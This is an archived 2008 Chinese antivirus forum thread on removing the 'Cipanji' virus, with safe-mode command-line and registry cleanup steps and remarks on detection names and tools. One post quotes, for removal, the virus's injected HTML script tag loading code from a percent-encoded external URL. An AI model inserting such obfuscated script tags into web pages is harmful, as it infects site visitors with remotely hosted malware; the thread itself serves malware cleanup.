楼主: 5551551
收起左侧

[病毒样本] 内核级恶魔病毒— 磁碟机 样本(已找到专杀+rappar大师纯手工解决方案)

 关闭 [复制链接]
IllusionWing
发表于 2008-3-2 21:25:51 | 显示全部楼层
佛云“难者不会,会者不难”
qianwenxiang
发表于 2008-3-2 21:34:23 | 显示全部楼层
汗。。刚进来看的时候我还以为这个帖子在论坛周游一圈又跑回样本区了呢。。
ALEXBLAIR
发表于 2008-3-2 21:35:31 | 显示全部楼层

回复 1楼 5551551 的帖子

首先,可以十分明确的说,你提供的样本在染毒后,重新启动到安全模式(命令提示符的)
,然后执行如下步骤即可清除病毒
(以卡巴为例子)
  1. cd/d %windir%\system32

  2. del /f dnsq.dll

  3. echo .>dnsq.dll

  4. echo Windows Registry Editor Version 5.00 >abc.reg

  5. echo.>>abc.reg

  6. echo [HKEY_USERS\55555555\machine\software\microsoft\windows nt\currentversion\Windows]>>abc.reg

  7. echo "AppInit_DLLs"="" >>abc.reg

  8. regedit.exe /s abc.reg

  9. cd/d "%ProgramFiles%\Kaspersky Lab\Kaspersky Internet Security 7.0"

  10. avp.exe /scan /all /i4
复制代码


如果你想手动处理,也是可以的
打开每一个html/js/htm的文件然后在最后一行删除掉

  1. <script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
复制代码

对于程序文件,你删除以下文档
\WINDOWS\system32\dnsq.dll                     31.5kb
?:\pagefile.exe                                             8 KB
然后清理镜像劫持
最后,用autoruns清理启动项
以上全部在安全模式下进行。

[ 本帖最后由 ALEXBLAIR 于 2008-3-2 21:43 编辑 ]
qianwenxiang
发表于 2008-3-2 21:55:36 | 显示全部楼层
不知道管不管用的一玩意

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ALEXBLAIR
发表于 2008-3-2 21:56:30 | 显示全部楼层

回复 24楼 qianwenxiang 的帖子

这个是?释放dll的?

baidu找不到这个东西阿~~~~

google第一个就是~~~国产货果然不行~~

[ 本帖最后由 ALEXBLAIR 于 2008-3-2 22:02 编辑 ]
reg
发表于 2008-3-2 21:57:57 | 显示全部楼层
红伞C版居然没报
hello8888
发表于 2008-3-2 22:07:38 | 显示全部楼层
C:\...\王之王.rar >>RAR >>新建文件夹\pagefile.pif - 可能是 Win32/Genetik 木马 的一个变种
qianwenxiang
发表于 2008-3-2 22:10:35 | 显示全部楼层

回复 25L ALEXBLAIR 的帖子

如果只有它一个去卸载DLL的话ms不行,GSS挂起那个进程的时候再卸载DLL就成功了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
ALEXBLAIR
发表于 2008-3-2 22:19:13 | 显示全部楼层
[:27:] 其实icesword打不开是因为采用了镜像劫持,改个名字就可以拉~~~
欧把icesword.exe改为pagefile.exe,和那个小鬼的名字一样就可以启动了。[:26:]

然后用is的进程限制,逐个取消lsass.exe的反复注入。

接下去清理他的服务和相关的启动项就可以了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qianwenxiang
发表于 2008-3-2 22:20:54 | 显示全部楼层
文件夹太乱了 is记不得放在哪儿了 汗
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 22:49 , Processed in 0.091217 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表